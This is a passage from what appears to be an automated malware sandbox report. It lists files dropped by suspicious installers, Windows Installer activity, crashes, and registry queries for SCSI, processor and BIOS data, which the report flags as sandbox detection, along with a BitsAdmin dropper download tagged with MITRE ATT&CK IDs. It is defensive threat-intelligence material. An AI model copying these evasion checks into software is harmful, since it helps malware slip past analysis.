File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-UI2QG.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File opened for modification	C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe	Setup.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\connection.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-30NRF.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll	AzRQxmcTqX_2X8NQkYpru4an.exe

Drops file in Windows directory 31 IoCs

Processes:

UserOOBEBroker.exemsiexec.exeSystemSettings.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Installer\MSI5057.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI522D.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF5C40AC84DFBE0889.TMP	msiexec.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setupact.log	SystemSettings.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	UserOOBEBroker.exe
File created	C:\Windows\Installer\f754ac5.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6BC3.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}	msiexec.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	SystemSettings.exe
File opened for modification	C:\Windows\Installer\MSI6FCC.tmp	msiexec.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	UserOOBEBroker.exe
File opened for modification	C:\Windows\Installer\MSI4EDF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4D08.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6A4B.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\SystemTemp\~DF4E1498EFE88FD676.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\f754ac5.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6F10.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI679A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4D86.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIF4CC.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DFDA3B11CDD4260A2B.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF21298F90F3F9AE1F.TMP	msiexec.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	SystemSettings.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	UserOOBEBroker.exe
File opened for modification	C:\Windows\Installer\MSI4C3C.tmp	msiexec.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	SystemSettings.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2228	6140	WerFault.exe	rundll32.exe
2420	5968	WerFault.exe	Info.exe
2084	2344	WerFault.exe	xEL0UOsp9f5GdO130zgfqNJ8.exe
7132	5204	WerFault.exe	TFHkMhqeTSNcqQMPGLxmtN9g.exe
1992	5656	WerFault.exe	fVqhXPVEa95IDkaUhXHBvgdO.exe
5444	6024	WerFault.exe	dSoPTyxhok6cHs2ybW6rnWhT.exe
2468	6168	WerFault.exe	w_T2ZpoqCL6IAkXoimhlntEt.exe
7596	5768	WerFault.exe	rundll32.exe
3932	7016	WerFault.exe	askinstall53.exe
5796	5676	WerFault.exe	1470615.exe
4620	3488	WerFault.exe	rundll32.exe
3484	5916	WerFault.exe	8607405.exe
7996	3392	WerFault.exe	F11A.exe
6004	3264	WerFault.exe	explorer.exe
4564	4476	WerFault.exe	2533838.exe
604	5288	WerFault.exe	5831941.exe
2712	6860	WerFault.exe	4700446.exe

Checks SCSI registry key(s) 3 TTPs 27 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ys8YRG5UgmpkjNZexReC2Xbd.exeSystemSettings.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ys8YRG5UgmpkjNZexReC2Xbd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{104ea319-6ee2-4701-bd47-8ddbf425bbe5}\0003	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{104ea319-6ee2-4701-bd47-8ddbf425bbe5}\0002	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\FriendlyName	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ys8YRG5UgmpkjNZexReC2Xbd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{104ea319-6ee2-4701-bd47-8ddbf425bbe5}\0002	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{104ea319-6ee2-4701-bd47-8ddbf425bbe5}\0003	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName	SystemSettings.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	ys8YRG5UgmpkjNZexReC2Xbd.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exey_b0wCZGcPi6yl3YyF3GVSz5.exeWerFault.exeanyname.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSystemSettings.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	anyname.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	anyname.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	anyname.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe

Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

1604 bitsadmin.exe

pid	process
1604	bitsadmin.exe

Enumerates system info in registry 2 TTPs 39 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeanyname.exey_b0wCZGcPi6yl3YyF3GVSz5.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeSystemSettings.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	anyname.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	anyname.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	SystemSettings.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	SystemSettings.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	y_b0wCZGcPi6yl3YyF3GVSz5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 43 IoCs

Processes:

sihclient.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	sihclient.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	sihclient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	sihclient.exe
